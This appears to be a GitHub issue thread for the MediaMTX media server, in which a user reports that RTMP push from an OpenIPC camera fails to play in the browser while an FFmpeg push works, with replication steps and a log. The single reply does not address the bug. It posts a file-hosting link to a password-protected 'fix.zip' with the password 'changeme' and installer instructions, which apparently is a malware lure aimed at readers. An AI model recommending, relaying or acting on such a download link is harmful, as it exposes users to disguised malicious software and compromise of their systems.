### ISSUE TITLE
MediaMTX is incompatible with RTMP push stream from an IP camera running OpenIPC (Linux-based OS)

### ISSUE THREAD

**Issue by usa-** [bluenviron/mediamtx#3695]
## Which version are you using?

v1.8.5

## Which operating system are you using?

- [ ] Linux amd64 standard
- [ ] Linux amd64 Docker
- [x] Linux arm64 standard
- [ ] Linux arm64 Docker
- [ ] Linux arm7 standard
- [ ] Linux arm7 Docker
- [ ] Linux arm6 standard
- [ ] Linux arm6 Docker
- [ ] Windows amd64 standard
- [ ] Windows amd64 Docker (WSL backend)
- [ ] macOS amd64 standard
- [ ] macOS amd64 Docker
- [ ] Other (please describe)

## Describe the issue

MediaMTX does not support RTMP push from an IP camera running [OpenIPC](https://github.com/OpenIPC).

While
* [HappyTime Media Server](https://www.happytimesoft.com/products/media-server/index.html) supports OpenIPC RTMP stream, and
* MediaMTX supports FFmpeg RTMP stream.

## Describe how to replicate the issue

1) Download MediaRTC from its release page, unpack and run.
2) Push a stream from the IP camera running OpenIPC: Majestic / Settings / Output to rtmp://[MediaMTX]/mystream. **I can publish such a stream to your IP address.**
3) Open http://[MediaMTX]:8889/mystream with your browser.
4) The video in the browser does not play.
5) Close streaming from the IP camera running OpenIPC.
6) Stream a movie with `FFmpeg`, like this:
```
ffmpeg -re -i ./video.avi -c:v libx264 -c:a aac -bf 0 -f flv rtmp:/[MediaMTX]/mystream
```
7) The video in the browser , which you opened earlier, starts playing.

## Did you attach the server logs?

yes
[mediamtx.log](https://github.com/user-attachments/files/16749869/mediamtx.log)

## Did you attach a network dump?

no

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
